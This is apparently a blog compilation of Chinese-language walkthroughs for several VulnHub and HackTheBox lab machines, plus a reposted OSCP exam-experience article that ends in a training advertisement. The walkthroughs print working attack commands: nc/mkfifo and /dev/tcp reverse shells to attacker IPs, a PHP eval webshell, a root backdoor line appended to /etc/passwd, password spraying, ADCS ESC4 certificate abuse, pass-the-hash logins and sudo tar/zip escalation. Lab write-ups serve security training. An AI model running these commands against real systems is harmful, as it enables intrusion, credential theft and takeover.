靶机Misdirection: 1 ~ VulnHub Misdirection: 1 ~ vulnhub下载链接见：https://download.vulnhub.com/misdirection/Misdirection.zip这里我们需要看首先我们使用arp-scan对内网主机进行发现随后对靶机进行端口扫描，有一个22端口ssh协议，80端口开启了http协议，还有3306的mysql数据库端口，8080也是http协议访问80端口，并从wappalyzer信息收集插件看到这个cms是Drupal随后点击进入到这个界面，告诉我们说这个系统是开源的，并且有源代码，还有一个下载选项登录框尝试万能密码，却限制了我们只能使用邮箱登录，随后我们尝试注册一个用户却提示了一个信息，无法发送电子邮件随后这里有一个Source Code源码，查看这个作者的源码中包含了一个admin，（其他代码信息没啥利用价值）尝试访问却提示管理因不安全通道而关闭突然发现我们目录扫描还没扫呢，通过扫描结果也能看到目标站点设置了防目录扫描功能切换思路，我们来到8080端口，意外的发现这是一个wordpress的内容管理系统按照常规的方式，首先是后台的爆破http://10.10.10.129:8080/wordpress/wp-admin但是呢它重定向到了另一个页面，而且这个页面并不是在当前的这个界面当我利用dirb进行目录扫描的时候呢，不扫wordpress这个命令，有一个debug发现了新的突破口当我想要创建一个交互式的终端的时候呢，发现使用su命令并不能正常的使用python3 -c 'import pty;pty.spawn("/bin/bash")'只能被迫使用nc进行反弹shell，反弹成功后就能利用su命令切换用户啦rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f接下来就是信息收集，一条龙下来就可，也可以使用自定义脚本学习文章参考：近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等全部获取完成后，你会发现几个关键的点，sudo 可以利用，有一个/bin/bash，但是需要brexit用户才能用奥还有个思路就是前端有wordpress，那么必定和数据库有交互，我们来看配置文件，能看到密码找到了第一个和密码相关的，那么这个密码是不是root用户的密码呢？很明显，不会让你这么轻易获得root权限的登录数据库mysql -ublog -pabcdefghijklmnopqrstuv找用户表破解失败了，不过不要紧我们继续回到那个sudo，他说了要求brexit用户才能执行那个/bin/bash，那么久指定一个用户吧sudo -u brexit /bin/bash相当的棒，提权成功，经过一番折磨后，该收集的信息都收集了，直到我翻到.viminfo，看到了用户编辑过/etc/passwd，这个文件主要记录了一些vim的编辑历史查看权限，这下不就有思路啦（那么多信息收集命令，既然少了这么重要的东西。。。。。。赶紧补上）然后我们仿照/etc/passwd的格式生成一个账号 bAIbAIxiaoyu 和密码123456，将这个用户分到root组下echo 'bAIbAIxiaoyu:$1$oFd2MoKR$eVjr6Fe7JWwjAPEfaTQSy.:0:0:root:/root:/bin/bash' >> /etc/passwd至此渗透结束往期推荐红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎！媲美DeepSeek，附源码【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入（sql十大注入类型）：技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细 

什么是OSCP国际渗透测试专家中级认证？ 一、OSCP认证是什么？首先介绍下OSCP认证，目前安全技术类的证书有很多，像是CEH，Security+，CISSP等等。除了众多侧重于笔试的安全认证，OSCP(Offensive Security Certified Professional) 是为数不多得到国际认可的安全实战类认证。目前在国外受到广泛认可，在台湾、香港等地区也比较流行，国内刚刚起步，拿到认证的还不是很多，主要集中在安全企业和审计公司。官方介绍：https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/OSCP认证，是一个专门针对kali Linux渗透测试培训课程的专业认证。该认证机构声称，OSCP认证是一个区别于所有其它认证的考试，考试全程采取手动操作的方式，而不设笔试环节。认证条件：无考试形式：OSCP的认证考试也是另类的存在，考生拥有24小时的时间（实际是23小时45分钟）去完成考试，具体如何分配时间由考生自己决定。题目是5台主机（随机抽取），目标是攻入并拿到最高权限（ROOT/SYSTEM）。基于难度级别，成功执行的攻击会获得相应的积分。24小时结束之后，你还有24小时去完成并提交考试报告（需要详细说明攻击步骤和里程碑截屏来证明确实攻破并获得相应权限）。考试费用：$800美元（30天实验室访问+认证）当然也有更多时长的实验室访问套餐，详情如下，具体选哪个可根据自身情况自行选择：二、课程内容有哪些？OSCP的整个课程还是比较体系化的，涵盖了渗透测试中的大部分内容，内容包括：被动信息收集、主动信息收集、漏洞扫描、缓冲区溢出、Win32缓冲区溢出攻击、Linux缓冲区溢出漏洞、漏洞利用、文件传输、提权、客户端攻击、WEB应用攻击、密码攻击、端口重定向和隧道、Metasploit框架、免杀、渗透测试实战演练等。整个知识框架还算完整，但其中的web应用攻击和缓冲区溢出部分内容感觉还是不够深入，与国内的教程比起来略显简单。web渗透中并没有各种绕过waf的奇淫巧技，缓冲区溢出部分也没有突破系统的各种防护手段……三、学习方式是怎样？目前官方推荐自学，官方会提供教材（约350页的PDF教材）和教学视频（约8小时的mp4视频）以及为学员提供的交流论坛和在线的lab实验室环境。注册、约定lab时间并付款后，官方会在lab开始那天邮件你教材和视频文件的下载链接，并开通论坛账号及实验环境vpn链接，你就可以学习教程并链接lab环境进行实验练习了。其中注册环节可能会遇到一些坑，这里就不细说，可以参考《OSCP认证教程第一集：注册教程》文章。通过自学教程你会掌握渗透测试中的大部分基本技能，在通过lab环境下的实战靶机练习将理论练习实际会对学习的知识有更深入的理解。其中lab环境下大概有53台靶机，靶机上预置了有漏洞的程序或者服务，你需要通过运用教程里学到的技能来获得服务器的最高控制权，并在靶机里获取proof.txt文件。我在买的是30天的ab实验，然而由于一些个人原因并没有投入大量时间，靶机做了20多台。但基本了解了lab环境和漏洞发现及利用的方法。个人认为做练习只是一方面，掌握方法才是学习的关键，因为漏洞是不断出现的，题目是永远做不完的，只有掌握原理及方法才是关键。当然如果有时间还是要尽量多做些lab的，毕竟是花了钱的哈。四、怎么考试呢？通过30天的lab学习后我约了考试，约考的链接会在之前官方发你的邮件中有。我是lab结束后才开始约考的，约考的时候才发现考试空挡已经排到了3周以后……早知道应该提前把考试时间约好，因为刚做完lab的时候状态是最好的，过个3周有些内容已经开始慢慢忘记……考试是在线进行的，并且有视频监考。具体来说就是你在约定的考试时间会收到官方的邮件，会给你一个考试环境的vpn连接文件，使用方法与lab的一样，并告诉你考试题目的IP地址（一般会是5台目标机器），题目满分是100分，70分通过。考试之前是要进行身份确认的，会通过摄像头进行身份的确认，所以你要准备好护照（为什么是护照呢？因为官方会要求政府颁发的、有照片的、英文的证件，国内符合要求的也只有护照了），身份验证后就可以vpn连接考试环境了。我约的是早上8:00的开始，早早的就起来做好了准备，7:45准时进行身份确认，其中遇到了网络不稳的情况，官方那边一开始一直看不到我这边的摄像头，重启了下家里的路由器就好了（也有小伙伴用4G手机热点开始的，因为部分地区的小区宽带连不上考试环境），然后vpn连接进考试环境，网络还算稳定，忙乎到8:30才算正式开始考试答题。我先选择了一道25分的缓冲区溢出的题目，花了大概2个小时，总算完成了poc的编写，拿到了shell，一看还是system权限，稳稳的拿到了proof.txt。其中遇到了一点小波折就是badchars漏了一个字符的，碰巧shellcode里有用到了这个字符，反复调试了好几遍才发现。不过还好没有ASLR、DEP等机制需要破，所以OSCP里面的漏洞挖掘还是比较基础的，因为真正的挖掘是在OSCE认证里，这也是我下一步要搞定的认证啦。解完这道理就有点饿了，然后和监考说了下休息半小时，吃了点水果。从考试开始不光是有摄像头监控的，我们的电脑屏幕监考也是可以看到的，所以当我们离开摄像头，桌面停止操作的时候是要和监考说一下的。半个小时后回来，在和监考打个招呼，发现监考的昵称换了，估计是几个人轮流监考……监考确认好后继续答题，选了另一个25分机器，很快通过一个web程序漏洞拿到了shell，但是只是user权限，找了很多本地提权的exp都没打成功……思路卡住了，果断换了一道10分的，看分值我以为应该是一个送分的题，结果真的是没那么简单，各种枚举都没发现问题，这时候心里有点慌，想换下一道但有不甘心，重新整理思路，重新扫描分析，折腾到傍晚才通过一个服务漏洞拿到了shell，正在我担心要怎么提权的时候，一看是root权限，顿时心情好了很多。到这里已经做出了两道半题目，算了下应该最少有45分了。在做缓冲区溢出的时候，为了节省时间我同时开了nmap跑其他机器的端口信息，简单看了下剩下2台的信息后实在太困了，和监考说了下，就去睡觉了，我还特意问了下去睡觉的话可不可以关机，监考说没问题，我就关了摄像头和电脑，定了闹钟睡了5个小时。醒来先是看了剩下的2个机器，一个隐蔽的web程序可以拿到shell，不出所料是个use权限，又是提权，搞了好久还是没搞定。剩下1台各种尝试，未果……2台20分的机器，我只拿到10分……算了下分数25+10+10+12.5=57.5，于是回过头来做前面那个25分的提权，各种百度无果，无聊中换成谷歌试试，结果还真有意外出现，找到国外一篇文章，研究了下，改了改利用代码，欧耶，成功拿到了system权限。稳了稳心情，默默的计算了下应该正好70分了，一看时间已经到了早上5:00，还剩将近3个小时，因为担心后面写英文报告会被扣分，所以还是想再拿些分数才放心。想到考试指导上说有一次使用msf的机会，想着应该是哪台机器会用得上，我就纠结了，用在那个提权上还是剩下那台呢？最后选择用在最后那台20分的机器上，各种漏洞自动过了一遍……没结果，后悔没写练习和lab的报告了（提交练习和lab报告会给加5分的）。看了下时间，已经没多少时间了，整理下了截图，并确认了下所有提交的proof.txt，然后和监考确认考试结束。这种24小时的考试真的是精疲力尽，又再次确认了下截图，每个flag的截图都有ipconfig或者ifconfig，关键步骤都有截图……然后就放心的睡觉了，因为还有24小时的时间要写一份英文的报告，这是考试的最后一步，也是我最薄弱的部分，睡醒了按照官方的模板，把握做出来的三个半机器的渗透过程都写了出来，当然是用最简单的语法和单词，主要全依赖了谷歌翻译，全篇都是短句，因为截图比较多，通篇用的最多的就是like this然后下面放上截图。整理完报告发现居然写了60多页，最后做成pdf压缩，上传到官方给的url，再把下载连接发给官方指定邮件。报告发送后24小时内会收到一封时间，告诉你已经收到你的报告，5个工作日内将告诉你开始结果。然后我等了5个工作日，在第6个工作日的上午收到了邮件：五、考试难不难？个人认为OSCP还是模拟实战渗透的，不像那些CTF需要各种脑洞大开。如果你在工作中就是做渗透测试的，那应该算是中等难度，如果是初学者，我建议还是需要认真的学完教程，并在lab环境中拿到30台以上的靶机。缓冲区溢出部分难度不大，教程和考试都是属于比较基础的难度。对于我个人来说，提权比较头疼，因为考试之前我也做了准备，网上找了各种提权一条龙的工具包，考试的时候用了发现就是一条虫啊，派的上用场的不多，所这部分还是要多积累，多做练习。总体上来说难度适中，毕竟70分就可以通过。六、备考有什么建议？a.学好英文很重要。不管是报告还是网上查资料，都需要英文的读写能力，如果英文好会有很大帮助。（虽然后来我也有和官方沟通，对于非英语母语的考生报告里的语法和单词错误是不会扣分的。）b.学习的时候要做笔记。考试的时候由于紧张会很容易手忙脚乱，所以提前做好学习笔记很重要，没有思路的时候可以看下笔记也许就有新的发现。c.练习和lab报告。在lab练习期间最好把练习和lab中靶机的渗透过程写成报告，官方说提交练习和lab靶机10台不同漏洞利用的报告会在最终考试成绩上加5分，虽然分数不多，但在关键时候就是救命稻草了。d.多交流。官方也有交流的渠道，如论坛、IRC，当然需要英文沟通了，所以我在这方面就……你们多努力吧。七、哪些好的资料可以分享？我在学习和备考的时候参考的一些不错的资源，汇总如下：注册指南：《OSCP认证教程第一集：注册教程》Linux提权指南：https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/Windows提权辅助脚本：https://github.com/pentestmonkey/windows-privesc-check模拟练习平台（跟Lab环境类似）：vulnhub、hacktheboxbadchars工具：https://github.com/mgeeky/expdevBadChars还有就是github上可以搜索“OSCP”找到很多资源，但是每个人的基础不一样，别人总结的不一定适合你，建议大家还是多多总结多多交流。——本文转载自freebuf作者：安全圈套的套哥如果有师傅们想要考取这个认证，并且无从下手，或者没有信心，我们提供一对一的专家咨询，以及我们的OSCP培训课程3999元的限时优惠价，在校生立减500元，也就是3499元既可以获得7年红队，OSEP国际渗透测试专家高级认证的一对一教学服务 

HTB-EscapeTwo HTB：EscapeTwo已有信息为rose/KxEPkKe6R8su我们使用nmap进行端口扫描nmap -sT -p- -T5 -A -Pn 10.10.11.51Tips：如果发现端口扫描的慢的话，要用代理比如小猫，kali代理到小猫的那个端口，修改proxychAIns的配置文件 /etc/proxychAIns4.conf 然后 proxychAIns openvpn lab_xxxxx.ovpn 挂到后台就行修改hostsecho "10.10.11.51 sequel.htb" | sudo tee -a /etc/hosts尝试一个基本的smb枚举（已知信息），看看是否能登录成功┌──(root㉿kali)-[/data/demo] └─# crackmapexec smb sequel.htb -u rose -p KxEPkKe6R8su --computers SMB sequel.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domAIn:sequel.htb) (signing:True) (SMBv1:False) SMB sequel.htb 445 DC01 [+] sequel.htbrose:KxEPkKe6R8su SMB sequel.htb 445 DC01 [+] Enumerated domAIn computer(s) SMB sequel.htb 445 DC01 sequel.htbDC01$枚举smb服务器共享信息smbmap -u 'rose' -p 'KxEPkKe6R8su' -H 10.10.11.51使用smbclient登录┌──(root㉿kali)-[/data/demo] └─# smbclient //sequel.htb/Users -U sequel.htb\rose Password for [SEQUEL.HTBrose]: Try "help" to get a list of possible commands. smb: > dir . DR 0 Sun Jun 9 09:42:11 2024 .. DR 0 Sun Jun 9 09:42:11 2024 Default DHR 0 Sun Jun 9 07:17:29 2024 desktop.ini AHS 174 Sat Sep 15 03:16:48 2018 6367231 blocks of size 4096. 880750 blocks avAIlable smb: > ┌──(root㉿kali)-[~] └─# smbclient //sequel.htb/'Accounting Department' -U sequel.htb\rose Password for [SEQUEL.HTBrose]: Try "help" to get a list of possible commands. smb: > dir . D 0 Sun Jun 9 06:52:21 2024 .. D 0 Sun Jun 9 06:52:21 2024 accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024 accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024 6367231 blocks of size 4096. 871029 blocks avAIlable smb: >参数解释smbclient : 这是一个用于与SMB/CIFS（Common Internet File System）服务器进行交互的命令行工具。它可以用来浏览共享资源、上传/下载文件等操作。//sequel.htb/Users : // 这是目标SMB共享的起始路径，sequel.htb是目标主机的域名或IP地址，Users 是共享资源的名称，通常表示存储用户文件的共享文件夹。-U sequel.htb\rose : -U参数用于指定连接时使用的用户名，sequel.htb工作组/域，rose具体的用户名执行该命令后，系统通常会提示输入 rose 用户的密码。输入正确的密码后，用户将能够访问 Users 共享中的文件和目录，类似于在文件资源管理器中访问网络共享。我们登录到Accounting Department这个smb服务器的时候发现了两个xlsx表格文件，我们尝试将这个文件下载下来我们使用get命令下载这两个文件此时得到了密码信息angela/0fwz7Q4mSpurIt99 oscar/86LxLBMgEWaKUnBG kevin/Md9Wlq1E5bZnVDVo sa/MSSQLP@ssw0rd!有一个sa账户，像是mssql的用户名和密码，并且1433端口也是开启的（待会会用上）我们将上面的密码保存到一个txt文件中，枚举域内用户echo '0fwz7Q4mSpurIt99 86LxLBMgEWaKUnBG Md9Wlq1E5bZnVDVo MSSQLP@ssw0rd!' > pass.txt netexec ldap 10.10.11.51 -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users将用户名保存到user.txtAdministrator Guest krbtgt michael ryan oscar sql_svc rose ca_svc此时你的目录下面有这四个文件┌──(root㉿kali)-[/data/demo] └─# ls accounting_2024.xlsx accounts.xlsx pass.txt user.txt就接下来使用密码喷洒得到账号密码信息oscar 86LxLBMgEWaKUnBG通过 WinRM（Windows Remote Management）协议对目标主机 10.10.11.51 进行身份验证nxc winrm 10.10.11.51 -u 'oscar' -p '86LxLBMgEWaKUnBG'利用mssql执行系统命令netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'whoami'利用dir进行目录遍历，发现一个sql2019，应该是mssql的目录netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir c:/'继续遍历netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir c:SQL2019ExpressAdv_ENU'发现一个sql-Configuration.INI文件netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir c:SQL2019ExpressAdv_ENU'查看文件内容netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'type c:SQL2019ExpressAdv_ENUsql-Configuration.INI'发现两个东西SQLSVCPASSWORD="WqSZAF6CysDQbGb3" SQLSVCACCOUNT="SEQUELsql_svc"参数介绍SQLSVCACCOUNT表示 SQL Server 服务将在一个名为 sql_svc 的域账户下运行。SQLSVCPASSWORD 是 SQLSVCACCOUNT 账户的密码再次进行密码喷洒 netexec mssql 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success得出两个凭证，测试哪个能利用winrm进行登录netexec winrm 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success得出一个结果ryan用户能使用远程登录evil-winrm -i 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3'切换到ryan的桌面，找到第一个flag提权域内信息收集使用netexec枚举靶机域内信息netexec ldap 10.10.11.51 -d sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3' --dns-server 10.10.11.51 --bloodhound -c Allbloodhound用于分析和可视化域内的用户、组、计算机、权限关系等数据，帮助安全研究人员或攻击者快速发现攻击路径和权限提升机会。下载由图标可见，ryan用户对ca_svc用户具有WriteOwner权限查看ca_svc用户信息net user ca_svc /domAIn由输出可见，该用户属于Cert Publishers组使用bloodyAD将ca_syc用户拥有者修改为ryan用户┌──(root㉿kali)-[/data/windows_atk/script] └─# bloodyAD -d sequel.htb --dc-ip 10.10.11.51 --dns 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan' [+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc使用 ryan 的凭据将 AD 对象 ca_svc 的所有者权限转移给 ryan，是典型的权限提升或后渗透操作。成功执行后，攻击者可完全控制 ca_svc 账户，进一步渗透域环境。这里如果失败的话呢，需要重置一下机器，因为可能是别人打过的┌──(root㉿kali)-[/data/windows_atk/script] └─# python dacledit.py -action 'write' -principal 'ryan' -target 'ca_svc' 'sequel.htb/ryan:WqSZAF6CysDQbGb3' Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] DACL backed up to dacledit-20250309-193835.bak [*] DACL modified successfully!将本地时钟与靶机同步sudo ntpdate 10.10.11.51使用certipy-ad创建ca_svc用户影子证书，获得该用户NTLM密码哈希certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -target sequel.htb -dc-ip 10.10.11.51 -ns 10.10.11.51账号：ca_svc密码hash：3b181b914e7a9d5508ea1e20bc2b7fcegit clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.git cd .Ghostpack-CompiledBinaries upload Certify.exe .Certify.exe find /domAIn:sequel.htb由输出可见，该模板对DomAIn Admins具有注册权利，而且Cert Publishers对该模板具有完全控制权限，因此恶意利用该模板即可获取管理员密码哈希使用certipy-ad通过ca_svc哈希密码枚举靶机ADCS尝试发现该漏洞┌──(root㉿kali)-[/data/windows_atk/script] └─# certipy-ad find -u ca_svc@10.10.11.51 -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -vulnerable -stdout Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA [!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP [*] Got CA configuration for 'sequel-DC01-CA' [*] Enumeration output: Certificate Authorities 0 CA Name : sequel-DC01-CA DNS Name : DC01.sequel.htb Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3 Certificate Validity Start : 2024-06-08 16:50:40+00:00 Certificate Validity End : 2124-06-08 17:00:40+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : SEQUEL.HTBAdministrators Access Rights ManageCertificates : SEQUEL.HTBAdministrators SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins ManageCa : SEQUEL.HTBAdministrators SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins Enroll : SEQUEL.HTBAuthenticated Users Certificate Templates 0 Template Name : DunderMifflinAuthentication Display Name : Dunder Mifflin Authentication Certificate Authorities : sequel-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectRequireCommonName SubjectAltRequireDns Enrollment Flag : AutoEnrollment PublishToDs Private Key Flag : 16842752 Extended Key Usage : Client Authentication Server Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1000 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins Object Control Permissions Owner : SEQUEL.HTBEnterprise Admins Full Control Principals : SEQUEL.HTBCert Publishers Write Owner Principals : SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins SEQUEL.HTBAdministrator SEQUEL.HTBCert Publishers Write Dacl Principals : SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins SEQUEL.HTBAdministrator SEQUEL.HTBCert Publishers Write Property Principals : SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins SEQUEL.HTBAdministrator SEQUEL.HTBCert Publishers [!] Vulnerabilities ESC4 : 'SEQUEL.HTB\Cert Publishers' has dangerous permissions由末尾输出可见，利用该模板可导致ESC4漏洞攻击certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -k -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.10.11.51 -debug使用certipy-ad请求一份Administrator用户符合模板要求的证书certipy-ad req -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb -target DC01.sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -dc-ip 10.10.11.51使用certipy-ad借助pfx证书通过身份认证，使用impacket-psexec通过上述哈希凭证登录靶机certipy-ad auth -pfx administrator_10.pfx impacket-psexec sequel.htb/administrator@10.10.11.51 -hashes 'aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff'C:UsersAdministratorDesktop 找到root.txt文件C:UsersAdministratorDesktop> type root.txt 6ca10bc95839bb3243539e3d7ea4f362至此，靶机渗透结束往期推荐红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎！媲美DeepSeek，附源码【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入（sql十大注入类型）：技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细

FristiLeaks1.3-提权靶机渗透 清者自清链接：https://www.vulnhub.com/entry/fristileaks-13,133/作者：Ar0xA难度：中等主机发现，以及快速的80探测全端口syn扫描nmap -sS 192.168.111.153 -T4 -p- -A爬虫协议这个界面似曾相识啊，就是上面那些url，一个路径下面有一个图片，这不就是Tr0ll系列的内容嘛？那个FTP匿名登录的。这张图告诉我们说，This is not the url，不是这个url，貌似是想要我们找URL信息分析源码，从这个图片标签中，就能分析出网站根目录中都对应着一个图片查看这个图片的上级目录，没有利用信息首页源码wappalyzer信息那么只剩下首页那几个大字了找到上面那张图的最后一个单词，fristi打靶机的时候，一定要第一时间查看源码！这里有一个base64编码信息这里可以看到是一个png的文件头，说明是一个png文件将他重定向为一个png文件密码信息KeKkeKKeKKeKkEkkEk，但是没有用户啊继续查看源码，eezeepz此时得到了账号密码登录成功让我们选择一个图片文件随意上传，Only allowed are: png,jpg,gif，限制了png，jpg，gif格式抓包改格式，还是上传失败的看这里，有一个apache中间件利用这个apache中间件的解析漏洞，他不是一个编号漏洞，而是配置不当，具体描述如下访问成功连接即可反弹shell/bin/bash -i >& /dev/tcp/192.168.111.128/6666 0>&1创建一个交互式终端python -c 'import pty; pty.spawn("/bin/bash")'从当前网站根目录开始信息收集，既然涉及到了登录，那么大概率用到了数据库，检查一下checklogin.php账号密码：eezeepz / 4ll3maal12#目前也就只有这一条信息eezeepz 用户存在，使用数据库的密码尝试登录，失败了其他信息收集bash-4.1$ uname -a Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux bash-4.1$ lsb_release lsb_release bash: lsb_release: command not found bash-4.1$ cat /etc/os-release cat /etc/os-release cat: /etc/os-release: No such file or directory bash-4.1$ find / -perm -4000 -print 2>/dev/null find / -perm -4000 -print 2>/dev/null /bin/mount /bin/fusermount /bin/umount /bin/su /bin/ping /bin/ping6 /sbin/pam_timestamp_check /sbin/unix_chkpwd /usr/bin/crontab /usr/bin/chsh /usr/bin/sudo /usr/bin/chfn /usr/bin/newgrp /usr/bin/chage /usr/bin/gpasswd /usr/bin/passwd /usr/libexec/openssh/ssh-keysign /usr/libexec/pt_chown /usr/sbin/suexec /usr/sbin/usernetctl直到回家的路上，看到一个jerry写的txt文件，似乎是让我们清理掉eezeepz的homehey eezeepz your homedir is a mess, go clean it up, just dont delete the important stuff. -jerry很多的命令，但是有也包含了一个txt文件查看内容意思大致就是说，需要将 /usr/bin/* 目录下的文件夹中复制到我home下面，来自/home/admin/下面这段话，应该是说让我们建立一个计划任务，每分钟以我的用户（admin）进行运行根据上面的提示，让我们放入一个runthis文件，而这个文件，类似/etc/crontab（计划任务）文件，在这里是以admin用户定时执行任务，所以我们的思路是可以利用这个漏洞拿到admin的shell开启一个微型的http服务python -m http.serverTips ：wget的时候，不添加http等关键字也可以wget 192.168.111.128:8000/py_shell_release.py方法一：echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > runthis这个时候也能直接查看admin目录下面的文件信息了，越权成功方法二：echo '/usr/bin/python /tmp/py_shell_release.py' > runthis此时就可以直接断开连接了，然后nc监听就行（耐心等待一会儿），反弹成功，获取到admin用户的权限创建交互式终端，查看这两个txt文件python -c 'import pty; pty.spawn("/bin/bash")'不清楚上面是什么加密的话，可以查看当前目录下面的一个py文件，包含了这个加密的信息，通过这些代码，就可以写出解码的代码解码的代码参考import base64,codecs,sys def decodeString(str): base64string= codecs.decode(str,'rot13') return base64.b64decode(base64string[::-1]) cryptoResult=decodeString(sys.argv[1]) print cryptoResult第一个结果：LetThereBeFristi!第二个结果：thisisalsopw123切换一个用户看看，成功一个去到当前用户的根目录，~，有一个suid文件sudo -l 也是这个文件，有了suid还能sudo不知道文件怎么用？history，继续信息收集发现能够以root身份执行命令 sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash那么使用 /bin/bash 试试，提权成功。如果/bin/bash不成功，还可以试试反弹shell往期推荐【oscp】WEBDEVELOPER，tcpdump提权【oscp】tar、zip命令提权—zico2【oscp】稀有靶机-Readme【oscp】Hackme【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【oscp】Node

tar、zip命令提权—zico2 【OSCP】tar、zip命令提权—zico2本次靶机为zico2，OSCP类型的主要利用的是tar命令和zip命令的提权下载链接：https://download.vulnhub.com/zico/zico2.ova主机发现 && 80探测nmap全端口扫描dirb目录扫描标题包含的版本信息漏洞检索，此版本有一个远程命令执行漏洞查看内容根据提示来输入admin密码后，进入后台编写一个poc.php记好了这个“数据库”（一句话木马的php文件）的绝对路径 /usr/databases/poc.php填写名称和字段数写好我们的payload <?php @eval($_POST[cmd])?>看到提示说明我们创建成功了github上是让我们复制一个文件到根目录就可以了，但是我们没有命令执行继续信息收集，一句话木马已经上传成功了点着点着也就发现这个可能存在漏洞点这个，不就是文件包含嘛，试试普通的文件包含，利用成功有了文件包含，还有我们的脚本文件的路径，那么就有思路了，包含我们的“数据库”/usr/databases/poc.phpkali开启监听，准备反弹shell反弹shell（其他的都不行）rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.128 6666 >/tmp/f成功创建交互式终端python -c "import pty; pty.spawn('/bin/bash');"内网信息收集，低版本的ubuntu系统，首先想到的就是内核提权漏洞检索提权失败继续信息收集joomla内容管理系统的配置文件中，FBVtggIk5lAzEU9H，利用su切换zico用户，失败wordpress内容管理系统的配置文件，切换用户成功有了密码，就可以利用sudo了，可以看到这个用户是可以利用sudo进行提权的，要用到tar命令或者zip找找suid文件那么就利用tar命令提权了 sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shzip+sudo提权TF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT 'sh #'往期推荐【OSCP】靶机-election【OSCP】sudo的上级目录提权，靶机SkyTower【OSCP】稀有靶机-Readme【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】Tr0ll 靶机全系列（1-3），FTP被玩坏了【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！